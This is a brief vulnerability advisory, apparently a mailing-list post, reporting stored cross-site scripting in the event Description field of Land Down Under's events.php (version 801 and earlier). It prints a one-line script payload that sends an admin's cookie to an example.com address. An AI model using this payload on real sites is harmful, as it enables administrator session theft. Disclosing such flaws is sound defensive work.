Land Down Under 'events.php' Cross Site Scripting Vulnerability
In Land Down Under (LDU http://www.neocrome.net/), the target script
"events.php?m=add" is vulnerable to XSS.
When submitting an event, the "Description" field is vulnerable to HTML
injection. Any user logged in can submit an event but an admin must approve of
the event before being publicly viewed. Using javascript, an admin's cookie
can be stolen.
Exploit:
Description:
<script>document.location="http://example.com/script?cookie="+escape(document.cookie)</script>
LDU 801 and earlier are vulnerable.
--------------------------------
conor.e.buckley@xxxxxxxxx
http://quixote.at.preempted.net